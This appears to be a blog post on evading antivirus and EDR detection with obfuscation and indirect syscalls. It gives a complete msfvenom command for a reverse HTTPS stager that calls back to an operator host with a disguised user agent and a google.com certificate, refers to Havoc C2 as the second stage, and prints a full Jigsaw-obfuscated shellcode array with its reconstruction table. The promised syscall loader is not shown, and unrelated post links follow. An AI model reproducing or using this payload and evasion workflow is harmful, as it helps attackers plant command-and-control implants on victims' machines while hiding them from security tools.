zgtangqian.com

Bypassing AV and EDR: Indirect Syscalls and Obfuscation Techniques

Written on

In this article, we will explore a method to evade signature detection by antivirus programs through the use of obfuscation and indirect system calls leveraging NT APIs. This technique can help in bypassing certain AV solutions that primarily rely on signature-based detection and endpoint detection and response (EDR) systems that focus on inspecting system call return addresses rather than the complete stack.

Generating Shellcode with Msfvenom

The Havoc C2 shellcode is quite large, so we will create our shellcode using msfvenom to retrieve the Havoc C2 shellcode as a second-stage payload. We'll refer to this shellcode as msf.bin.

msfvenom -p windows/x64/custom/reverse_https LHOST=192.168.0.64 LPORT=8443 EXITFUNC=thread -f raw HttpUserAgent='Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' LURI=blog.html HandlerSSLCert=/home/atler/Downloads/www.google.com.pem -o msf.bin

For more details on creating a HandlerSSLCert, please refer to my previous post.

Generating Shellcode with Havoc C2

Refer to my earlier post on setting up the listener and creating the shellcode payload. We will use nearly all the same options for the payload, but we won't utilize indirect syscalls since our loader PE will handle that. This shellcode will be called Havoc.bin.

Obfuscating Msfvenom Shellcode

Jigsaw is a tool that takes raw shellcode and produces randomized shellcode, along with a lookup table and a C/C++ stub that can reconstruct the original shellcode. This method is beneficial because it prevents a significant increase in entropy—something that could trigger detection by EDR/AV systems—while keeping the payload size manageable compared to methods that substitute words for shellcode.

You can find Jigsaw on GitHub: GitHub - RedSiege/Jigsaw: Hide shellcode by shuffling bytes into a random array and reconstruct at runtime.

The developer notes that “at some point, the deobfuscated shellcode will exist in memory and could be detected there. The methods used to load and execute the shellcode also present opportunities for detection.” EDR solutions generally have an edge over AV solutions due to their emphasis on behavioral analysis and memory monitoring. Download the provided Python script and run it with your generated msfvenom shellcode to create jigsaw.txt.

python3 jigsaw.py msf.bin

The output will be found in the jigsaw.txt file, which reconstructs the shellcode for use in our loader project in Visual Studio:

unsigned char jigsaw[826] = { 0x36, 0x56, 0x58, 0x83, 0x18, 0x37, 0x89, 0x96, 0x00, 0x6a, 0x07, 0x77, 0x5a, 0xe8, 0x02, 0x0b, 0x32, 0x5e, 0x50, 0xc1, 0x48, 0xba, 0xba, 0x54, 0x41, 0x89, 0x65, 0xc1, 0xc7, 0x6b, 0x48, 0xd0, 0x48, 0xff, 0x53, 0x6a, 0x48, 0x00, 0x00, 0xc0, 0x46, 0x75, 0x2e, 0x6c, 0x38, 0x48, 0x47, 0x85, 0x01, 0x83, 0x53, 0x58, 0x48, 0xff, 0x6a, 0x4c, 0x68, 0x66, 0x4d, 0x79, 0x9e, 0xe0, 0x8b, 0x71, 0xc7, 0x00, 0x44, 0x39, 0x44, 0x59, 0xd2, 0x40, 0x67, 0x33, 0xc4, 0x58, 0x00, 0x67, 0x53, 0x5a, 0x51, 0x58, 0x57, 0x44, 0x73, 0x02, 0x8b, 0x34, 0x74, 0x3b, 0x57, 0x56, 0x50, 0x00, 0x47, 0x00, 0x71, 0xff, 0x00, 0x6c, 0x5a, 0x4d, 0xff, 0x53, 0x8b, 0x00, 0x59, 0x74, 0x5a, 0x52, 0x4b, 0xc1, 0x71, 0x75, 0x7a, 0x85, 0x57, 0x00, 0xc1, 0xc0, 0xff, 0x66, 0x48, 0x7a, 0x00, 0x4b, 0x62, 0x0f, 0x00, 0xff, 0x58, 0x30, 0x41, 0x6e, 0x00, 0x57, 0x12, 0x67, 0x41, 0x49, 0xbe, 0x6a, 0x03, 0xc9, 0x56, 0x90, 0x04, 0xd5, 0x74, 0x4d, 0x48, 0x31, 0x48, 0x4b, 0x10, 0x37, 0x4c, 0xe0, 0x4d, 0x61, 0x12, 0x84, 0x6c, 0x48, 0x53, 0x3c, 0xe1, 0x43, 0x57, 0x77, 0x85, 0x8b, 0x52, 0xfc, 0xc0, 0x33, 0xd5, 0x34, 0x6b, 0x00, 0xff, 0x96, 0x31, 0x89, 0x76, 0xff, 0x32, 0x89, 0xd5, 0x41, 0x1f, 0x72, 0x24, 0x0f, 0x59, 0xf1, 0x77, 0x6b, 0x69, 0x53, 0x48, 0x75, 0x48, 0x24, 0x44, 0x00, 0xe2, 0x78, 0xc6, 0x46, 0x02, 0x58, 0x50, 0x53, 0xa7, 0x49, 0x74, 0x50, 0x49, 0x00, 0xc2, 0x8b, 0x8b, 0x4c, 0x4d, 0x6b, 0x46, 0x2d, 0x72, 0x65, 0x52, 0x66, 0x20, 0x52, 0x00, 0x50, 0x88, 0x8b, 0x31, 0x41, 0x56, 0xf9, 0xd5, 0x52, 0xe1, 0xe2, 0xd8, 0x37, 0xd5, 0xed, 0x45, 0x48, 0x26, 0xd5, 0x7a, 0x41, 0x2d, 0x00, 0xff, 0x73, 0x00, 0x78, 0x00, 0x49, 0x00, 0xe4, 0x32, 0x72, 0x04, 0x7a, 0x76, 0x79, 0x49, 0x00, 0x89, 0x69, 0x00, 0x6a, 0x49, 0x75, 0x47, 0xc7, 0xdb, 0x89, 0x00, 0x42, 0x53, 0x53, 0x52, 0x5a, 0x52, 0x31, 0x39, 0x5a, 0xa4, 0x44, 0x80, 0xd5, 0x71, 0xf9, 0x20, 0x48, 0x6a, 0xd5, 0x65, 0x41, 0x33, 0xda, 0x4d, 0x89, 0xc0, 0x9f, 0xff, 0x55, 0x31, 0x6e, 0x00, 0x4a, 0x77, 0x53, 0x5a, 0x34, 0x42, 0x06, 0xc2, 0x68, 0x36, 0xd0, 0x59, 0x48, 0x31, 0x2d, 0x6c, 0x34, 0xe0, 0x4d, 0x5a, 0xe2, 0x35, 0x01, 0x46, 0x48, 0x4a, 0x13, 0x41, 0x76, 0x65, 0x31, 0x38, 0x34, 0x52, 0x53, 0x71, 0x48, 0x89, 0x00, 0xba, 0xff, 0x55, 0xc7, 0xd3, 0x31, 0x49, 0x2e, 0x80, 0x64, 0x31, 0x88, 0xff, 0x69, 0x00, 0x01, 0xd5, 0x6c, 0x36, 0x35, 0x75, 0xdc, 0x53, 0x48, 0xcf, 0x62, 0x8b, 0x45, 0xaa, 0x41, 0x53, 0x44, 0x6a, 0xc9, 0xeb, 0x39, 0x30, 0x20, 0xf1, 0x4f, 0x00, 0x89, 0x00, 0x40, 0x85, 0x00, 0x71, 0x68, 0x4d, 0xc9, 0x72, 0xc0, 0x41, 0x00, 0x01, 0x0a, 0x42, 0xc1, 0x4b, 0x0d, 0x52, 0xff, 0x00, 0xe3, 0x89, 0xff, 0x34, 0x48, 0x65, 0x31, 0x68, 0x6d, 0x66, 0x78, 0xff, 0x0d, 0x34, 0x53, 0x48, 0x52, 0x18, 0x34, 0x36, 0x65, 0x00, 0x62, 0x49, 0xb7, 0x00, 0xc9, 0x4d, 0xf1, 0xd0, 0x49, 0x50, 0x50, 0x4f, 0x41, 0x78, 0x08, 0xeb, 0x28, 0xc9, 0x59, 0xd5, 0x51, 0x53, 0x56, 0x89, 0xd1, 0x01, 0x41, 0xe8, 0x41, 0x39, 0x2e, 0x31, 0x00, 0xe2, 0x30, 0x8b, 0x64, 0x40, 0x01, 0x00, 0xe0, 0x38, 0x66, 0x48, 0x85, 0x46, 0x2a, 0x8b, 0x49, 0xc9, 0x50, 0x58, 0x2f, 0x8b, 0x0c, 0x48, 0x0d, 0x89, 0x44, 0x44, 0xc7, 0x00, 0x77, 0x48, 0x00, 0x45, 0xe8, 0x74, 0x57, 0xc3, 0x04, 0xff, 0x01, 0x37, 0x20, 0x48, 0x53, 0x58, 0x30, 0xe9, 0x42, 0x00, 0xff, 0x51, 0xff, 0x54, 0xe7, 0x6a, 0x53, 0x34, 0x6a, 0x8b, 0x41, 0x56, 0xba, 0x72, 0x47, 0x42, 0xfb, 0xa8, 0xc2, 0x71, 0x66, 0x59, 0x00, 0x49, 0x5a, 0x89, 0x48, 0xc6, 0x52, 0xc0, 0x48, 0x47, 0x4b, 0xc9, 0x48, 0x50, 0x77, 0x48, 0x4d, 0x2d, 0x54, 0x31, 0xd0, 0xf1, 0x39, 0x51, 0x32, 0x1f, 0xe1, 0x88, 0x00, 0x36, 0x6b, 0x67, 0x48, 0x00, 0x6a, 0x68, 0x00, 0x48, 0x75, 0x41, 0x71, 0x01, 0xda, 0x00, 0x81, 0x2e, 0x31, 0x55, 0x46, 0x77, 0x53, 0x49, 0x35, 0xc9, 0x83, 0x46, 0x56, 0x31, 0x58, 0x53, 0x59, 0x58, 0x73, 0x49, 0x00, 0x73, 0x4a, 0x41, 0x55, 0x47, 0x20, 0x62, 0x69, 0x50, 0x41, 0x58, 0x44, 0xd5, 0x8b, 0x00, 0x3c, 0xba, 0x43, 0xe8, 0x31, 0x41, 0x4d, 0xc0, 0x00, 0x49, 0xac, 0x41, 0x74, 0x72, 0x58, 0x31, 0x48, 0x8b, 0x4a, 0x41, 0xc0, 0x89, 0x67, 0x6c, 0x89, 0x41, 0xc0, 0x36, 0x00, 0xcc, 0x64, 0x18, 0x51, 0x70, 0x48, 0x12, 0x52, 0x00, 0x53, 0xf1, 0x53, 0x00, 0xd0, 0x61, 0x00, 0xc1, 0x83, 0x5f, 0x64, 0x33, 0x0a, 0x57, 0xb8, 0x53, 0x53, 0x54, 0x72, 0x48, 0x38, 0x53, 0x65, 0xc9, 0xe0, 0x53, 0x00, 0x6a, 0x71, 0x18, 0x00, 0xf0, 0x89, 0x1c, 0x48, 0x89, 0x2f, 0x60, 0x00, 0x54, 0x48, 0x84, 0x49, 0xe5, 0x76, 0x2e, 0x49, 0x41, 0x00, 0xff, 0x48, 0x89, 0x5a, 0x78, 0x38, 0x36, 0x57, 0x50, 0x32, 0xba, 0x01, 0x57, 0x48, 0x6a, 0x6f, 0x45, 0x6d, 0x6d, 0x7c, 0x00, 0x4c, 0x4a, 0x59, 0x7b, 0xd0, 0x37, 0x89, 0x51, 0x50, 0x72, 0x40, 0xec, 0x6b, 0xd6, 0x00, 0x88, 0x49, 0x00, 0x77, 0x77, 0x00, 0x36, 0x48, 0x77, 0x75, 0x4d, 0x93, 0x3a, 0x75, 0xc1, 0x45, 0xff, 0x86, 0x68, 0x5a, 0x78, 0x75, 0x67, 0x48, 0x49, 0x73, 0x52, 0x0f, 0xbb, 0x89, 0x48, 0x33, 0x4a, 0x44, 0x20, 0x89, 0x73, 0xf0, 0x00, 0x55, 0x41, 0x53, 0x20, 0x00, 0x79, 0x6d, 0x54, 0x5a, 0xc7, 0xac, 0x74, 0x4a, 0x49, 0x5f, 0xc0, 0x46, 0x5d, 0x5a, 0x49, 0x00, 0x49, 0x2c, 0x8b, 0xc0, 0x41, 0x74, 0xba, 0x51, 0x31, 0x1d, 0x03, 0xc4, 0x00, 0x2d, 0xc9, 0x00, 0x58, 0x33 };

int positions[826] = { 461, 19, 179, 2, 664, 427, 290, 721, 814, 627, 240, 493, 193, 319, 695, 81, 421, 185, 13, 61, 771, 787, 719, 399, 480, 310, 473, 674, 293, 477, 231, 182, 648, 117, 505, 615, 74, 725, 795, 779, 382, 487, 602, 326, 438, 672, 378, 84, 127, 799, 770, 530, 126, 604, 813, 146, 523, 407, 643, 546, 635, 141, 34, 346, 673, 686, 350, 276, 104, 747, 17, 106, 99, 521, 800, 810, 94, 409, 541, 288, 486, 579, 348, 548, 555, 82, 164, 506, 227, 603, 309, 230, 36, 593, 484, 764, 367, 641, 88, 403, 249, 253, 809, 257, 89, 273, 815, 732, 462, 465, 516, 139, 420, 142, 571, 730, 433, 793, 134, 252, 666, 428, 180, 551, 685, 210, 325, 83, 753, 796, 757, 471, 229, 225, 314, 566, 788, 328, 59, 718, 220, 304, 305, 255, 261, 806, 176, 690, 559, 37, 109, 655, 289, 406, 752, 472, 144, 626, 414, 455, 720, 805, 466, 206, 769, 73, 233, 481, 534, 413, 802, 30, 67, 0, 47, 621, 825, 499, 468, 297, 728, 789, 275, 649, 349, 317, 418, 246, 729, 188, 671, 445, 147, 804, 186, 143, 347, 456, 222, 218, 194, 633, 741, 158, 388, 86, 791, 423, 608, 634, 52, 436, 542, 306, 263, 171, 98, 437, 708, 688, 661, 175, 168, 457, 654, 432, 476, 405, 362, 549, 345, 162, 54, 27, 272, 103, 91, 123, 652, 122, 389, 320, 318, 199, 710, 62, 153, 570, 797, 63, 547, 606, 239, 605, 344, 198, 434, 92, 692, 440, 266, 539, 321, 755, 640, 3, 587, 35, 628, 371, 525, 262, 777, 592, 716, 338, 678, 469, 624, 513, 560, 235, 217, 784, 586, 72, 411, 657, 31, 496, 14, 644, 454, 577, 758, 167, 90, 667, 478, 785, 32, 774, 711, 642, 353, 55, 398, 782, 385, 625, 645, 311, 213, 444, 216, 223, 794, 43, 439, 303, 740, 286, 368, 663, 599, 442, 361, 76, 453, 715, 251, 565, 333, 124, 201, 299, 451, 706, 531, 138, 518, 573, 44, 676, 713, 507, 501, 120, 374, 535, 342, 738, 504, 40, 778, 677, 680, 808, 474, 749, 743, 581, 659, 278, 620, 379, 512, 675, 268, 224, 622, 60, 766, 393, 396, 683, 670, 733, 576, 25, 693, 359, 108, 426, 697, 12, 759, 681, 540, 582, 600, 150, 557, 107, 614, 500, 751, 790, 687, 157, 668, 298, 554, 341, 352, 118, 85, 750, 163, 754, 172, 610, 401, 56, 483, 58, 618, 211, 93, 114, 574, 212, 419, 704, 446, 380, 511, 567, 450, 561, 824, 271, 377, 243, 612, 449, 110, 495, 280, 226, 87, 364, 502, 42, 763, 653, 580, 717, 102, 159, 337, 528, 558, 190, 79, 148, 696, 737, 656, 739, 269, 448, 646, 115, 775, 151, 112, 174, 698, 629, 410, 284, 16, 274, 723, 544, 66, 532, 745, 101, 591, 684, 503, 77, 45, 96, 383, 819, 22, 631, 301, 394, 714, 324, 207, 165, 584, 136, 742, 458, 475, 598, 702, 238, 1, 322, 149, 270, 331, 366, 811, 712, 807, 181, 460, 801, 780, 583, 812, 283, 209, 569, 8, 765, 11, 241, 360, 773, 563, 372, 373, 609, 105, 183, 384, 632, 422, 543, 489, 295, 588, 236, 340, 376, 204, 265, 783, 617, 709, 29, 312, 392, 803, 65, 514, 424, 39, 21, 459, 550, 129, 250, 662, 524, 300, 113, 650, 336, 402, 556, 616, 247, 177, 228, 429, 537, 527, 15, 762, 744, 330, 637, 245, 400, 821, 517, 75, 823, 792, 78, 329, 46, 601, 526, 479, 244, 748, 355, 135, 195, 529, 533, 130, 154, 256, 630, 189, 491, 258, 726, 497, 568, 578, 416, 339, 197, 343, 564, 594, 10, 184, 351, 242, 156, 315, 49, 259, 417, 5, 279, 178, 119, 97, 572, 679, 132, 746, 488, 395, 202, 254, 215, 26, 435, 137, 669, 772, 375, 441, 822, 203, 294, 285, 7, 6, 415, 80, 18, 412, 95, 208, 64, 639, 707, 776, 596, 313, 161, 50, 590, 291, 735, 611, 447, 536, 820, 522, 585, 248, 658, 408, 470, 100, 281, 302, 20, 57, 817, 595, 727, 390, 467, 28, 316, 682, 607, 170, 116, 722, 334, 24, 287, 363, 33, 589, 292, 760, 509, 282, 234, 133, 700, 200, 734, 705, 187, 482, 140, 404, 485, 397, 277, 756, 160, 335, 691, 430, 327, 520, 332, 699, 51, 323, 237, 552, 191, 665, 173, 386, 613 };

Share the page:

Twitter Facebook Reddit LinkIn

-----------------------

Recent Post:

Innovative Approaches to Stress Relief That May Surprise You

Discover unexpected methods for managing stress beyond conventional techniques.

Understanding Federal Reserve's Path to Correcting Inflation

An analysis of how Fed Chair Powell's late recognition of inflation issues could lead to more aggressive monetary policies.

Recognizing Strengths: Shifting Focus from Dark Dots to Bright Spaces

This piece explores the importance of focusing on our strengths rather than our weaknesses, inspired by the

Uncovering Gary McKinnon's Controversial NASA Hack and UFOs

Explore the shocking story of Gary McKinnon, who hacked NASA seeking UFO evidence, and the ongoing debate surrounding extraterrestrial life.

Top Five Must-Read Books Endorsed by Joe Rogan for Growth

Discover the transformative books highly praised by Joe Rogan that can enhance your life and perspective.

The Varginha Incident: Unraveling the Mystery of Brazil's UFO Encounter

Explore the intriguing Varginha incident in Brazil, where sightings of an unusual creature raised questions about UFOs and folklore.

Mastering Key Hormones for Effective Weight Management

Understanding the role of insulin, leptin, and cortisol is crucial for effective weight management and overall health.

Maximizing Productivity Through the 80/20 Principle

Discover how the 80/20 rule can enhance your productivity and efficiency in various aspects of life.